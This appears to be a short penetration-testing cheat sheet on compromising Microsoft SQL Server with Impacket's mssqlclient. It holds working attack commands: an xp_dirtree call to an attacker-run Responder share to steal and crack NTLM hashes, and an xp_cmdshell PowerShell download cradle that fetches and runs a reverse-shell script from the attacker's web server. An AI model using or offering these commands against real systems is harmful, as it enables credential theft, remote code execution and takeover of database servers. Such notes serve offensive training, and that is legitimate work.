Microsoft SQL Server
MSSQL is a relational Database management system from Microsoft. As a database server it’s primary function is storing and retrieving data for other application software. SQL is usually used to create the database manage it.
Shells
If you have credentials you can use a tool from Impacket, MSSQLClient.py.
Since MSSQL is a normal Microsoft Service your goal should be to get a Shell with something like Netcat and the try to escalate the priveleges for example with a tool like WinPEAS.MSSQLClient.py
MSSQLclient.py
This is a tool created to get a Shell on a MSSQL server. The usage is pretty basic. here is the most common syntax.
impacket-mssqlclient -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>You can ignore the
-dboption if you don’t know the name of the database on the server. After logging in you will be presented with a SQL shell. The option-windows-authwill enable Windows Authentication by default it is disabled. Here are a few things you can/should do as soon as you get in.Steal NTLM Hash with Responder
sudo responder -I <interface> #Run that on your machine SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcatEnable Remote Code Execution
First you need to enable code execution in the first place. In MSSQL it is the
xp_cmdshell. Then it is recommended to spawn a Reverse Shell like Netcat. Just host the executable for the shell on a Web Server on your machine, download and run it on the MSSQL server.SQL> enable_xp_cmdshell SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://<YOUR IP>:<YOUR PORT>/reverse_shell.ps1") | powershell -noprofile'Sources
Link to original